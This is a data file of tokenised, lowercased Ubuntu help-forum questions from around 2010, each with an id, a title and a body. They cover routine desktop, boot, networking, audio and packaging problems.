767	how to get .so file to show up in package ?	as many of you know by now , i 'm building a package : ) i am so close to getting it finished so i can upload it to my ppa , but there is still one slight problem : the shared library ( .so file ) does n't want to go into the package . okay , here is what i have in my control file : source : jsoncpp priority : extra maintainer : ****** build-depends : debhelper ( > = 7 ) standards-version : 3.8.3 section : libs homepage : http : //jsoncpp.sf.net package : jsoncpp-dev section : libdevel architecture : any depends : jsoncpp0 ( = $ { binary : version } ) description : json parsing library for c++ jsoncpp is a c++ library that makes it easy to read / write json data . . this package contains the development tools necessary to create applications that use jsoncpp . package : jsoncpp0 section : libs architecture : any depends : $ { shlibs : depends } , $ { misc : depends } description : json parsing library for c++ jsoncpp is a c++ library that makes it easy to read / write json data . now , jsoncpp-dev builds fine and the development files show up in the package but the shared library does not show up in its package . here is what jsoncpp0.dirs looks like : usr/lib ... and jsoncpp-dev.dirs : usr/lib usr/include my updated makefile is here . please let me know if you need further information .
772	how do i update grub to grub2 if legacy grub is installed in boot partition sector , not mbr ?	i 'm trying to move to grub2 and while chainloading from legacy grub works fine , i 'm not sure how to move completely . old grub was installed in boot sector of swap partition , /dev/sda3 , and was working fine there . i want new grub to be installed there as well but during upgrade-from-grub-legacy it suggest to install at mbr or at ubuntu root partition , /dev/sda4 . how do i force it to install at /dev/sda3 ? can i just do grub-install ' ( hd0,3 ) ' instead of upgrade-from-grub-legacy ?
773	how do i make my own customized ubuntu version ?	is there any gui tool for that ?
774	what are the benefits of using grub2 over grub ?	why would one move from grub to grub2 ?
776	how i can limit download/upload bandwidth ?	how i can limit download/upload bandwidth for : entire os . one network interface . single application .
781	how do you start-up in the login screen with num lock on ?	i use numbers in my password and would therefore like to start ubuntu with num-lock enabled . this would also be handy in a terminal window , that is ctrl+alt+f1 .
784	how do i remove windows but keep ubuntu ?	i want to keep ubuntu but remove windows .
787	how can i find out what is causing my gnome-panel to freeze ?	about once a day my gnome-panel freezes ( resulting in my thinking it is several hours earlier than it really is ) . how can i produce some sort of debug information to figure out what is causing the freeze or file a bug or see if its an existing bug when gdb is attached to gnome-panel and the bug occurs i can not get a stack trace out of gdb . reading symbols from /lib/libbz2.so.1.0 ... ( no debugging symbols found ) ... done . loaded symbols for /lib/libbz2.so.1.0 0x00007f7cefe10f48 in poll ( ) from /lib/libc.so.6 ( gdb ) c continuing . ^c ^c the `` ^c '' is to show that once the bug occurs gdb stops responding to ctrl+c and kill -int . how can i proceed ?
797	how can i make the fan in my computer turn off when it 's suspended ?	when my computer is suspended , the gpu , cpu and power supply fans all continue to run . i do n't think i 've ever been able to get them to turn off , short of hibernating or turning the computer off . i have some theories as to where to begin , but what i 'd like are some more solid ideas . i built this computer myself , so i think it 's possible that i did n't connect the fans to a proper power supply , so one theory is that i need to open the computer , and move the fan 's wire somewhere else on the motherboard . if this is correct , is there a way to know where to move it ? < -- this theory does n't make sense now that i realize it 's three different fans that keep running . my other theory is that i need to do something in my bios to make this change , and my third theory is that this is an ubuntu thing that i need to fix on the software side . does anybody know how to figure out why the fans never turn off , or what to do to fix them ? they do turn off when the computer is hibernating , but i do n't like doing that because it takes a very long time to boot up from hibernation .
798	what is ubuntu advantage ?	what is ubuntu advantage and how can it help my business ?
800	how to run scripts every 5 seconds using cron ?	i would like to know how to run a script every 5 second . i know that cron can do every minute . how do you get intervals below that ?
804	text editors in ubuntu ? vim vs. emac vs. nano	i was wondering the difference between these text editors and which is best used with ubuntu ? what are each of them good for ? are there better ones ?
813	simple software to show and modify gps tracks	i have gps tracks ( in gpx format ) that i usually use to geotag photos . is there a simple software to view these tracks ( i.e . : not use google earth ) ? a bonus would be simple modification , like deleting waypoints . tangogps seems to offer gps track import only in connection with geotagging for pictures .
814	how to run scripts on start up ?	i was wondering how to run scripts when my computer starts up so i do n't have to run scripts manually that i always run ?
823	choppy video playback	during the last couple of months i have had major problems playing high-definition videos in ubuntu . generally it 's 1080p videos that i have problems with , but i do recall having the same kind of problems with a 720p video a while back . this occurs on both my laptop ( with an integrated intel video chip ) and my desktop ( nvidia geforce 250gts ) . it 's strange , because i do n't think i 've had this problem in earlier versions of ubuntu , and it works fine in windows on the same machine ( s ) . the problems occur when trying to play a video that has been encoded to/with `` avc1 '' in an mkv container . i 'm not very knowledgeable when it comes to video codecs and such , but from what i 've read , avc1 seems like a pretty old codec . how come i have problems with that , when xvid works just fine ? suggestions on how to fix this problem ? edit : so i 've now tried all of the solutions proposed . none of them really worked , although some did lessen the choppiness . i even tried a 720p video using the same encoding , and that was also very choppy . could someone explain to me why this just will not work , when i can play back other 1080p videos flawlessly ?
829	debugging openoffice crashes	this is partly an openoffice question and partly a ubuntu question . i 'm running openoffice 3.2.0 and ubuntu 10.04 . i get frequent crashes of oo , especially the calc app , although i get crashes in the word processor as well . they are very abrupt and accompanies by no warning or error message . i 'm just typing away and then the app is gone . sometimes i even end up thinking i 'm typing in oo and discover that oo has crashed and i 'm typing in whatever application was under oo . however , i ca n't reproduce these crashes on demand . they seem random . i can open the same file and do the same exact thing but it does not crash . in ubuntu how do i trace , track , or diagnose these types of crashes ? is there software i can invoke to help diagnose ? can i start oo from a command prompt with debugging of some sort enabled ? note : if someone could add the tag openoffice , i would appreciate it
831	what does it mean that a package is `` set to manually installed ? ''	when packages are already installed and i run an apt-get install < package-name > , sometimes it will print a line < package-name > is set to manually installed . what does that mean ?
833	how can i make my windows `` burn '' when i close them ?	i have compizconfig settings manager installed , but i do n't know how to make windows burn when i close them . how can i make this so ?
834	weather notification attached to clock applet	i am unable to get the weather notification that comes with the clock applet to work . i have it set to ottawa , canada . what seems to be the problem . canada jokes to the minimum please : ) please and thank you .
842	how can a user avoid entering password on boot ?	is there a way to avoid entering a password in the process of booting up ? i am using a new and latest installation of ubuntu , with gnome desktop in it .
847	todo list and memory usage applet on desktop ?	i would like to have information on my desktop in a very simple text mod or memory usage and processor activity and daily to do lists . i was wondering what kind of applications are available on ubuntu for that ? please and thank you .
849	can i set up portage and use flags ?	i 'm rather familiar with portage and use flags in gentoo . after a quick google search , i did n't see any way to setup portage in ubuntu . is there a way ? is there an equivalent to use flags in ubuntu ?
852	why are flash applications so sluggish/crashy ?	i 've noticed that flash applications tend to be more sluggish under ubuntu than they do under windows on the same machine . this is particularly noticeable when watching hd video or playing graphics/physics-heavy games . are there any ways of improving the performance of flash under ubuntu , or is this just an issue with the linux version that i will have to live with ? currently i 'm just cutting down on the number of tabs open , blocking flash ads , and closing other programs , but i 'm looking for ways to affect flash itself . other things i have already been doing include using youtube 's html5 feature and playing videos straight from /tmp in vlc . i was wondering if there was some way of streamlining flash itself though . perhaps not . more specific question : is there anything i can do in mms.cfg to boost performance ?
855	songbird alternatives	i like the songbird player very much , and it used to be my only choice for all plataforms , but they have discontinued gnu/linux support for some time now , due to lack of people to help with the linux port . i would like to know what are the alternatives with similar features and usability out there .
856	how should a server be secured ?	talking towards ubuntu 10.04 , server edition , what tools/practices would you recommend to secure the server ?
860	how would you explain that ubuntu is fine for many people	how would you explain that ubuntu if fine for most people who just want to browse the web , write e-mail , and so on ?
863	change primary monitor	how do i change my primary monitor without using the command line ?
867	how can i stop being prompted to unlock the 'default ' keyring on boot ?	whenever ubuntu boots up , a dialogue pops up asking me to unlock my default keyring . is there some way this can unlock automatically through pam or some other magical way ?
868	how do i configure ubuntu for a public computer ?	how would you set up ubuntu on a computer that will be used as public computer in a library ? i need the following features and user restrictions : on boot , a guest user should automatically be logged in . only firefox , chrome and openoffice should be available for the guest user . the guest user should be able to write files to his/her usb stick , but never to the computer 's hard drive . any guidelines on how to set up something like this ? is there perhaps a remix of ubuntu created for this exact purpose ?
889	re-add the default top panel	i accidentally deleted the default top panel in ubuntu 10.04 . how can i restore it without completely re-building it one panel object at a time ?
894	how can i convert videos for my sansa fuze ?	the sansa fuze mp3 player can only play videos in its own special format , how can i convert videos to this format using ubuntu ?
897	how can i make fonts look like they do in windows ?	fonts look bad and blurry in ubuntu . when i compare a site in ubuntu and windows the windows font look much more readable even after i import all of my windows fonts . how can i change this ?
906	ubuntu and vlc -- make default and hue	i have recently installed vlc . i have found that when i play videos on vlc , the hue of the color of the video is off . i have to constantly readjust it . also how can i make vlc my default player for *.avi files ? please and thank you .
908	firefox middle mouse button scroll	how can i get the middle mouse button to behave correctly in ubuntu ? clicking the middle button does not show the arrow which allows me to scroll the page by moving the mouse . information : firefox 3.6.8 mouse : microsoft intellimouse explorer 3.0
915	is it possible to install without a cd or usb drive ?	i 've got a friend who wants to try ubuntu on his netbook , but does n't have a usb drive he can use , and of course the netbook does n't have a cd drive . is it possible for him to install ubuntu ?
916	common desktop login via network ( like ad for windows )	one of the reasons we use windows in the office at work is active directory . it makes it a piece of cake to bring up a new workstation and have a new or existing user login and do their work . once all the applications are installed , a user can login on any workstation and have all their documents and settings available to them . is there any way of doing this on ubuntu ? sure , there are syncing programs like ubuntu one that sync the files ( and hopefully eventually settings ) , but as far as i am aware it still requires each workstation the user wishes to log onto to already have their user account set . also , any time a user changes their password it needs to be changed on each machine the user logs into . it would also be useful if this applied to servers as well , so a user can ssh into a server and have the same files as on their desktop in their home directory . does this sort of ability existing in ubuntu currently ?
933	what is the meaning of the default directories in the linux filesystem hierachy ?	having installed various linux distros for tinkering , i 'm puzzled by the installers offering partition layouts - for an easy way out i just use the whole available disk space . some of the partitions offered have cryptic names , including /var , swap , /usr , and /home . the installers do n't really explain these to me - what purpose do they serve , and which , if any , should be used ?
935	using kate 's terminal plugin , how can i clear the terminal 's history ?	i want to clear all the history that i can scroll to , so that i start with a terminal without anything in it exempt the prompt . clear only creates a clear screen , but does not delete the scroll history .
943	ubuntu 10.04 server as a transparent proxy filter ( plus dans guardian )	i 've installed the server on a desktop with two network cards . i 've installed dnsmasq , squid , shorewall , ssh , and dansguardian . how do i get this device to talk to dsl modem and my network ( through my router ) i 've configured the network cards to separate networks . i 've set up the dhcp/dnc settings ( i did not install dhcp3-server , using dnsmasq ) . i 've tried following these instructions as guide line . http : //taksuyama.com/ ? p=16 any help would be great . these are great devices when they work for homes with kids !
953	connecting pppoe dsl modem to server ?	i 'm setting up a transparent proxy/filter server , i 've encountered many issues . my question . with a pppoe dsl modem how do i negotiate a connection from my server . i am putting the server between the modem and the router ( now just a switch and wifi ap ) the router did the pppoe login for me . my modem can be put into the following modes . pppoe on modem , pppoe on computer ( router ) , & bridge . i thought i could connect to the modem with a static ip with my 2nd nic with the pppoe on the modem . this did n't seem to work . for example the modem 's ip is 192.168.0.1 so i set a static ip of 192.168.0.2 this has worked in the past to connect and configure the modem . any help would be great !
954	what is needed to use ubuntu as a tv	i wish to occasionally use my ubuntu computer as a television . i am in the us and would like to watch over the air ( hd ) tv shows . the ideal situation would be the tv show in one window with some mouse & keyboard controls for volume & channel . i do not want or need a `` from the couch '' remote driven interface . what hardware will i need to buy ? what software packages should i install ?
959	why will unity have a global menu os x style ?	please explain to me why it was choosen , was it due to ubuntu copying mac os x or some other factor ( s ) ?
962	what is ubuntu one ?	are there any paid subscriptions available for ubuntu one ? what additional features does it have ?
970	what does the ubuntu foundation do ?	i heard that it was some sort of emergency fund or something .
974	how can i install software or packages without internet ( offline ) ?	i have a friend who has got a computer that is not connected to the internet . is there any way to install software offline easily ?
982	how are release codenames chosen ?	what criteria is used to select an ubuntu release codename , and who is ultimately responsible for the decision ?
988	how can i install windows software or games ?	can .exe and .msi files ( windows software ) be installed in ubuntu ?
991	is there a simple way to get django 1.2 . * ( latest stable ) installed ?	i want to start developing for it . i could easy_install or pip install but i 'd prefer a proper repo . is there a ppa that 's up to date ?
992	what is a motu ?	also , how can i become one ?
993	how can i create a software raid drive and install ubuntu desktop on that drive ?	since gparted does not support raid , what tools can we use to create a raid drive ( 0,1,5 etc ) and then install ubuntu onto that drive ? assume we are starting on fresh system with no os .
994	can i sync with my ios4 device such as iphone 4 and ipad ?	if ubuntu ca n't do this natively , are there any workarounds ?
999	how can i customize the gnome panels in ubuntu netbook edition ?	i 'm using ubuntu netbook edition , and i want to change the panel 's layout ( remove or move applets ) . but all applets are `` locked '' and i have no way to change that ... is there a way to make them `` unlocked '' again , so i can play with it ?
1004	what is the ayatana project ?	what does it do ?
1006	what is a paper cut ?	the one hundred paper cuts project says it will fix 100 'paper cuts ' in each release cycle . what is the definition of a paper cut ?
1007	installing netbeans 6.9	i downloaded the latest netbeans installer ( 6.9 ) which is not yet available on 10.04 . i tried to '' sudo ./netbeans-6.9-ml-linux.sh '' but it does not install anything . i get the following messages before the installer quits silently : configuring the installer ... searching for jvm on the system ... extracting installation data ... running the installer wizard ...
1012	reinstall ubuntu with encrypted home directory ?	i have ubuntu 10.04 installed with encrypted home directory . /home is on a aseparate partition . can i just boot from 10.10 cd , reformat '/ ' and install as usual ? i think it should work if i use the same password ? will it ? is there anything else to keep in mind ?
1020	who is sabdfl ? what does he do ?	what is the meaning of sabdfl ?
1026	how to compile source code from a tarball ?	please explain in an easy way .
1028	how to make a window transparent in gnome ?	i 'm working with many gis applications under gnome . it sometimes is very convenient to place one map over another to quickly spot differences . there used to be a kde trick to make any window ( not just a terminal ! ) transparent , thereby allowing me to make one map semi-transparent and place it on the window of the other mapping software . is there a similar trick for gnome ? thanks in advance , adam
1039	stop gwibber and empathy from scrolling to new messages	gwibber and empathy constantly scrolls to a new message as soon as they arrive , making it hard to read older messages , especially on irc . is there a way to tell gwibber and empathy to not jump to a new message as soon as it arrives ?
1042	sound , stopping between multiple programs	i fiddled about with pulseaudio , i think in my config files . now i ca n't play 2 things one after each other from 1 window ton another . e.g . on rhythmbox when i listen to a song then switch to youtube , youtube wo n't have any sound , and when i do it the otherway round rhythmbox wo n't play at all , its playback slider does n't move .
1044	what is btrfs ? what advanced features does it have ?	i heard that kernel 2.6.35 will have btrfs and that ubuntu 10.10 could have btrfs by default . what will be its features ? will i be able to migrate my data from my current ext4 partition ?
1050	how can i manage saved complete web pages and their directories ( e.g n.html and n_files ) in nautilus	using an arbitrary web browser , e.g . firefox , you can save a web page ( complete web page ) , for which it saves the html file , say n.html , and web page elements in a corresponding directory , n_files . in win7 , if you copy , move , rename either the folder of the html file , they are modified as a single unit . however , nautilus ( the default gnome file manager ) , does not do this . is there a nautilus script available to enable this functionality ? is there an alternative way to achieve the same thing ?
1057	refresh thumbnails in nautilus	how does one refresh thumbnails in nautilus ? in my videos folder i have some mkvs and only half of them have the movie border and a excerpt from the movie and the others ( also mkvs encoded in the same way ) just have the ordinary film icon . ( f5 doesnt do it . )
1059	using squashfs to edit a live cd ?	i 've been messing around with ubuntu customization kit recently and i would like to create my own bash scripts to customize ubuntu isos . how would i use squashfs to edit mount and edit the iso ?
1063	how do i install the google wave server software ?	now that the news is all around that google will stop wave development , and i like to keep using it , i was wondering how i can install their software . for example , is there a .deb package ?
1064	what is wubi ? how does it work ?	which process does it use to install ubuntu inside windows ?
1066	what are the pros and cons of the repository system concept used in ubuntu ( et al ) ?	how is it better than windows and mac system of downloading and installing applications from the web ?
1068	wondering how to get oem config to work with my custom distro	i 'm not sure how to get the oem install mode working with my ubuntu remaster . i 'm using remastersys to make the remastered ubuntu 10.04 distro and i do n't know how to make sure oems can use it . i have tried running sudo oem-config-prepare after installing the remaster ( with oem-config , oem-config-gtk , oem-config-remaster and oem-config-debconf installed from synaptic ) in a new account called `` oem '' with the password also `` oem '' . it tells me that i have to restart to show the system setup . so i did that , but it would not start into it . i pressed the escape key at plymouth to view the bootup in verbose mode and it told me this : traceback ( most recent call last ) : file `` /usr/bin/ubiquity-dm '' , line 476 , in < module > dm = dm ( vt , display , username ) file `` /usr/bin/ubiquity-dm '' , line 78 , in __init__ self.uid , self.gid = pwd.getpwnam ( self.username ) [ 2:4 ] keyerror : 'getpwnam ( ) : name not found : live' multiple times and that i could make a new account from the boot prompt . i attempted to do this but it was choppy and my key presses did n't appear to do anything until i pressed enter when it displayed only some of the key presses so setting up an account from the boot prompt was futile . i have also tried setting the live username to `` oem '' but the regular 7-step , non-oem installer shows up when i run ubiquity . i really need this to work as soon as possible ! thanks in advance !
1069	why is ubuntu more secure than windows or mac os x ?	please give some solid reasons . linked question how safe is ubuntu ?
1076	what is ubiquity ?	where is ubiquity used in ubuntu ?
1080	what is kernel mode setting ?	what happens when kms fails ?
1081	how do i encrypt my home partition ?	with ubuntu 9.10 i did not have any encrypted partitions set up , i have since installed a fresh ubuntu 10.04 . i have 3 partitions : os root ( / ) , home and swap . how do i enable encryption on my existing /home partition ?
1082	how can one get more than 12 commands in compiz- > commands ?	how can one get more than 12 comands in compiz- > comands ? it 's mainly for screen bindings .
1083	what is upstart ?	which operating systems besides ubuntu use it ?
1084	do android phones sync with ubuntu ?	some models only or all models ?
1086	how to make program autostart only in gnome	i use both gnome and kde sc . in gnome , i use docky but i do not use it with kde . so , i would like docky to start up only when i login into gnome not kde . in kde , there is an option to make a program autostart only in kde . but i can not find any such option in gnome . how can i do this ? thanks in advance .
1087	how to map a vpn ( tun0 ) network adapter on host ubuntu to a virtualbox guest windows ?	i have a ubuntu 10.04 running oracle virtualbox 3.2.6 with a windows xp guest . i use a vpn that i would like to be accessed by the guest vm , on a ifconfig it shows as : tun0 link encap : unspec hwaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00 inet addr:5.192.10.99 p-t-p:5.192.10.99 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1362 metric:1 rx packets:14151 errors:0 dropped:0 overruns:0 frame:0 tx packets:19860 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:500 rx bytes:4415271 ( 4.4 mb ) tx bytes:17949982 ( 17.9 mb ) using nat or bridge adapters on the vm only gives me the non-vpn adapter . how can i map the tun0 adapter to virtualbox ?
1090	why is defragmentation unnecessary ?	why is defragmenting unnecessary in ubuntu ?
1095	5.1 surround sound	ok , so i 've always had trouble with enabling 5.1 in ubuntu . running 'alsamixer ' : i have : master , heaphones , pcm , front , front mi , front mi , surround , center all are at 100 % card : hda intel chip : realtek alc888 ( this is my onboard sound , its a dell studio , with 7.1 integrated sound ) running `` speaker-test -c6 -twav '' i only get the front 2 speakers ( right/left ) making any noise . the others make no noise at all . i have no other sound card to use as all my pci slots are used up . daemon.conf : ; daemonize = no ; fail = yes ; allow-module-loading = yes ; allow-exit = yes ; use-pid-file = yes ; system-instance = no ; enable-shm = yes ; shm-size-bytes = 0 # setting this 0 will use the system-default , usually 64 mib ; lock-memory = no ; cpu-limit = no ; high-priority = yes ; nice-level = -11 ; realtime-scheduling = yes ; realtime-priority = 5 ; exit-idle-time = 20 ; scache-idle-time = 20 ; dl-search-path = ( depends on architecture ) ; load-default-script-file = yes ; default-script-file = ; log-target = auto ; log-level = notice ; log-meta = no ; log-time = no ; log-backtrace = 0 resample-method = speex-float-1 ; enable-remixing = yes ; enable-lfe-remixing = no flat-volumes = no ; rlimit-fsize = -1 ; rlimit-data = -1 ; rlimit-stack = -1 ; rlimit-core = -1 ; rlimit-as = -1 ; rlimit-rss = -1 ; rlimit-nproc = -1 ; rlimit-nofile = 256 ; rlimit-memlock = -1 ; rlimit-locks = -1 ; rlimit-sigpending = -1 ; rlimit-msgqueue = -1 ; rlimit-nice = 31 ; rlimit-rtprio = 9 ; rlimit-rttime = 1000000 ; default-sample-format = s16le ; default-sample-rate = 44100 ; default-sample-channels = 6 ; default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10
1097	how do i set up vlan forwarding ?	i have a daap server with multiple vlan interfaces . i would like to get traffic forwarded on all of the vlans . forwarded from eth0 to eth1.010* i 've got the switch configured to be a trunk port with the correct vlans , and i enabled /proc/sys/net/ipv4/ip_forward but that does n't seem to be doing the trick . is there anything else i need to do ? here is my ifconfig results , as you can see the vlan interfaces are n't really getting any traffic : eth0 link encap : ethernet hwaddr 00:14 : d1:10 : ca : fc inet addr:192.168.1.20 bcast:172.21.255.255 mask:255.255.0.0 up broadcast running multicast mtu:1500 metric:1 rx packets:536 errors:0 dropped:0 overruns:0 frame:0 tx packets:259 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:264232 ( 258.0 kib ) tx bytes:37425 ( 36.5 kib ) interrupt:20 base address:0xe000 eth1 link encap : ethernet hwaddr 00:1c : c4:31:28:22 up broadcast running multicast mtu:1500 metric:1 rx packets:303 errors:0 dropped:0 overruns:0 frame:0 tx packets:202 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:225213 ( 219.9 kib ) tx bytes:47118 ( 46.0 kib ) interrupt:17 eth1.0101 link encap : ethernet hwaddr 00:1c : c4:31:28:22 inet addr:172.17.1.20 bcast:172.17.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9076 ( 8.8 kib ) eth1.0102 link encap : ethernet hwaddr 00:1c : c4:31:28:22 inet addr:172.18.1.20 bcast:172.18.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9076 ( 8.8 kib ) eth1.0103 link encap : ethernet hwaddr 00:1c : c4:31:28:22 inet addr:172.19.1.20 bcast:172.19.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9076 ( 8.8 kib ) eth1.0104 link encap : ethernet hwaddr 00:1c : c4:31:28:22 inet addr:172.20.1.20 bcast:172.20.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9076 ( 8.8 kib ) eth1.0105 link encap : ethernet hwaddr 00:1c : c4:31:28:22 inet addr:172.21.1.20 bcast:172.21.1.255 mask:255.255.255.0 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:40 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:9076 ( 8.8 kib ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:16436 metric:1 rx packets:113 errors:0 dropped:0 overruns:0 frame:0 tx packets:113 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:20777 ( 20.2 kib ) tx bytes:20777 ( 20.2 kib ) here is my /etc/network/interfaces file : # this file describes the network interfaces available on your system # and how to activate them . for more information , see interfaces ( 5 ) . # the loopback network interface auto lo iface lo inet loopback # automagically configured network interfaces auto eth0 auto eth1.0101 auto eth1.0102 auto eth1.0103 auto eth1.0104 auto eth1.0105 iface eth0 inet static address 192.168.1.20 netmask 255.255.0.0 gateway 192.168.1.3 network 172.21.0.0 broadcast 172.21.255.255 iface eth1.0101 inet static address 172.17.1.20 netmask 255.255.255.0 iface eth1.0102 inet static address 172.18.1.20 netmask 255.255.255.0 iface eth1.0103 inet static address 172.19.1.20 netmask 255.255.255.0 iface eth1.0104 inet static address 172.20.1.20 netmask 255.255.255.0 iface eth1.0105 inet static address 172.21.1.20 netmask 255.255.255.0 thank you for any help , i 've been working on this for quite a while .
1099	chown : what does `` id -u '' represent	i am working to get mongodb running on a ubuntu server install . in reviewing the instructions i needed to create a `` \data\db '' directory in the root drive . at which point i needed to alter the owner using the chown command as follows : sudo chown `id -u` /data/db when i issue that command as it appears in the quick start guide i receive `` chown : invalid user : 'id -u ' . i am new to linux , so what i do n't understand is what the 'id -u ' was supposed to mean . when i replace with my user name the command completes just fine and mongo runs . can someone help me understand what the short hand 'id -u ' would communicate to an expert linux user that it did not to me ?
1102	are there currently any plans to replace rhythmbox with banshee in `` maverick meerkat '' 10.10 ?	since years there are rumours that rhythmbox will be replaced by banshee as default application in the next distribution-release . are there any plans for it to be replaced ? the information that i have found is ambiguous .
1109	are there any fallbacks for plymouth ?	if i am using the proprietary driver , i do n't get a good boot screen .
1110	since 10.04 the laptop 's extended monitor shows a shaky/waving image	my laptop is a `` lenovo t60p '' with an ati video card and it used to work fine on 9.10 . the external monitor works after full cycle of function+monitorkeys pressing , but the extended is not working properly . anything i should try ?
1120	how to learn vim on a high level ?	i know that vim ( like emacs ) is very powerful editor for programmers , as long as you know how to use it , its shortcuts , and so on . what steps can i take and what tutorials can i read to become an advanced vim user ?
1126	delay when playing sound	in a script i play a sound ( .ogg file ) using /usr/bin/play . the sound is played fine , but there is an annoying delay of a couple of seconds after the sound has been played before the program ( play ) terminates . why is that , and can it be fixed ? edit : the script is a git-commit hook . it just calls play -q filename.ogg . i have the same experience from the command line . i 'm on 10.04 if thats relevant .
1132	how do i share files on my home network ?	i would like to set up a home network with the various ubuntu machines i have at my home . they are all running 10.04 . it would have to be able to share files and maybe even chat . : ) any information on how to set this up would be beneficial . please and thank you .
1136	record sound from web cast	i want to record a radio webcast which does not offer mp3 . the easiest way to do it seems to be recording all system sounds , playing the webcast and saving as mp3 . this is legal , by the way - i want to record a radio show in which my friend was interviewed . this is permitted by the radio station ( and fair use according to israeli law afaik ) . thanks , adam
1142	how can i stop `gnome-screensaver` from resetting my keyboard to its default layout ?	i use xmodmap to alter my keyboard layout during session startup . however , each time the gnome screensaver/lock screen is activated , it resets the keyboard to its default layout , and i have to run xmodmap again to get my keybindings back . i understand that resetting the keyboard layout is the right thing to do before presenting a password prompt , but is there a way to stop the gnome screensaver from doing it ? or a way to tell gnome to use a custom keyboard layout all the time ?
1143	how can i uninstall software ?	seeing there are various ways to install on ubuntu . what are the various ways to uninstall items ? which ways always work ? how can i be sure something was uninstalled ?
1145	is there an alternative to adobe aftereffects ?	is there a after effects like software for ubuntu ( or for free ) adobe after effects is a compositing , compositional and post-production video tool . if you think about green-screening , those cool titles/credits , overlays with people 's names , infographics ... it 's all that stuff , and a lot more . like motion photoshop , in full hd .
1147	is ubuntu based on debian unstable or debian testing ?	which of the two it is ?
1148	what is the best place to install user apps ?	occasionally i am installing application with something other than apt-get or the package manager . what is the `` best practice '' location for installing user apps ? ( /usr/bin/ , /usr/local/bin/ , /opt/ , etc )
1158	how to set the terminal to open maximized	i want to tell compiz , metacity , the gnome-terminal or whoever is in charge to open the terminal window maximized by default . how can i do that ?
1164	how to easily resize images ?	i would like to know how to re-size images in ubuntu . what is the easiest tool to do so ?
1172	vmware/virtualbox 3d acceleration	can ubuntu guests get 3d acceleration in vmware / virtual-box ? i just want to enable desktop effects under virtualization , not 3d games .
1175	execute script before shutting down	when i shut down my computer i want to show some pending tasks that i have to do before leaving the office ... i did a local application to manage those tasks , basically i just want to run a command , and shut down after i kill the app executed .
1185	when will gtk improvements land in maverick ?	i want to see csd ( client side decorations ) , windicators and rgba .
1190	how can i make shutdown not require admin password ?	if more than one person is logged in on my computer , ubuntu requires super user authentication when shutting down the computer . how can i make it so that any user can shutdown the computer without being asked for a password ?
1193	how to setup a wireless connection with an eee pc 1005 ?	how to setup wireless in ubuntu 10.04 netbook edition in eepc 1005 ? do i need to install some drivers and how ? ps i am running ubuntu dual boot with xp ( in xp have wireless internet )
1194	what is the `` recovery '' option in the grub menu ?	i have a ubuntu 10.04 and windows 7 dual boot system . on boot , the grub menu appears . i see `` windows 7 '' and the normal `` ubuntu 10.04 '' but there 's also a `` ubuntu 10.04 ( recovery ) '' . what is the recovery option for ? what does it do differently ?
1204	how to create clickable notifications using pynotify ?	is it possible to show notifications displayed in right top ( like these about being connected to a wifi ) , that can be clicked ? right now i can either create a notification , that ca n't be clicked or create an ugly notification ( a dialog box ) , that can . i would like to have something non-obtrusive , that can be clicked and perform some action then .
1207	how can i install ubuntu without cd ?	my cd drive is broken , so i ca n't install ubuntu from a cd . are there any workarounds for that ?
1208	is there a directory of wine compatible software ?	is there a website that lists software that runs well , or not well , under wine ?
1210	how to sync idevices on pre ubuntu 10.04 ?	is there any way to sync idevices on karmic , jaunty and hardy ?
1220	how can i restart x-server from the command line ?	how can i restart x-server from the command line ? i 'd really like to be able to restart my gui without having to do a full system reboot .
1224	how do i determine the total size of a directory ( folder ) from the command line ?	is there a simple command to display the total aggregate size ( disk usage ) of all files in a directory ( folder ) ? i have tried these , and they do n't do what i want : ls -l , which only displays the size of the individual files in a directory , nor df -h , which only displays the free and used space on my disks .
1230	what 's the advantage of using ubuntu one vs. other services like dropbox ?	what features does ubuntu one provide that others services do not have ? can i use ubuntu one only on ubuntu machines ? what about sharing data/folders with others who do not have ubuntu one ?
1233	what 's the meaning of version numbering of ubuntu ?	what 's the meaning of the numbering for different versions ? do they signify something ?
1242	what are some useful keyboard shortcuts ?	i would like to learn some useful keyboard short cuts . i have become a ninja of keyboard short cuts in windows . any must have tips for ubuntu ? feel free to include ubuntu defaults or custom ones you have found useful !
1245	add default route on boot	i 'm trying to add a default route on my ppp0 connection , i want the default route points to that connection . i tried to add it in /etc/rc.local but i do n't think that is the right place to do so . i would like to know where is the right place to accomplish this .
1247	is there a way to link a vpn ( tun0 ) adapter to a fake physical ( ethx ) adapter ?	is there a way to link a vpn ( tun0 ) adapter to a fake physical ( let 's say ethx ) adapter ?
